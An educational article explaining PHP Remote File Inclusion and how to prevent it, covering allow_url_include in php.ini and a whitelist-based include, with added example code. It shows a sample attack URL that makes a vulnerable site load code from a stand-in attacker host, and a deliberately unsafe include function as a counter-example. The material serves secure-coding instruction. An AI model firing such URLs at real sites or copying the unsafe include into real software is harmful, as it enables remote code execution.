What Is Remote File Inclusion

Many web pages use include functions to combine the contents of other files into a single page. Unfortunately, if these inclusions are not securely implemented, they can be used to include files that the administrator has not approved. These files can sometimes be located on remote servers, which gives the vulnerability its name: Remote File Inclusion. With improved awareness of vulnerabilities like this, the folks behind PHP have taken precautions to help prevent remote file inclusion from occurring; however, if the server is misconfigured, the vulnerability can still exist.

A sample URL is shown below. It is fairly standard, with the exception that the filename parameter is a remote URL; this implies that when the URL is loaded, the remote file may be included as part of the requested page.

 https://vulnerable-bookstore.com/book.php?filename=https://attacker.com/malicious.php

So what's so bad about including remote files? After all, plenty of websites make use of iframes. Well, remote files aren't simply loaded and placed on top of the page: the file is retrieved from the remote server, included and executed. This is why remote file inclusion is so dangerous; the included files are treated as though they are part of the local website, and so the flaw becomes a form of remote code execution.

Preventing remote file inclusion

This kind of vulnerability can only occur if the server has allow_url_include enabled within the php.ini file. To disable this feature, locate the file and set the allow_url_include line to Off. It should appear like the example below.

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-include
allow_url_include=Off

If you insist on including remote files, the most secure course of action is to create a whitelist of safe domains/filenames. Should someone alter the domain or filename to an unauthorised option, the code then performs some alternate action rather than including and running the file.
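The unsafe include pattern beside the whitelist approach just described, as an added PHP example that is not part of the original post; the pages/ directory, the page names and the function names are assumptions.

```php
<?php
// Added example (not from the original post): an include driven by a request
// parameter, and the same feature rewritten around a fixed whitelist.
// Assumes the site's page fragments live in a local "pages/" directory (hypothetical).

// UNSAFE: the request parameter is handed straight to include().
// With allow_url_include=On, a remote URL in ?filename= is fetched and executed.
// Even with it set to Off, an unvalidated value can still pull in arbitrary
// local files, so the setting alone does not make this line safe.
function render_page_unsafe(): void
{
    include $_GET['filename'];
}

// HARDENED: the user supplies a short key, never a path or URL, and the key is
// mapped onto a whitelist of known local files. Anything not in the list
// (remote URLs, "../" sequences, unexpected names) gets the safe default page.
const ALLOWED_PAGES = [
    'book'    => 'pages/book.php',
    'authors' => 'pages/authors.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(?string $requested): string
{
    // Exact key match only; array_key_exists does no normalisation or guessing.
    if ($requested !== null && array_key_exists($requested, ALLOWED_PAGES)) {
        return ALLOWED_PAGES[$requested];
    }
    // The "alternate action" from the text: fall back to a known-safe page.
    return ALLOWED_PAGES['book'];
}

function render_page_safe(): void
{
    // __DIR__ anchors the include to this script's directory on disk.
    include __DIR__ . '/' . resolve_page($_GET['filename'] ?? null);
}

render_page_safe();
```

A request such as book.php?filename=authors includes pages/authors.php, while the remote URL from the sample request above matches no key and falls back to the default page.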
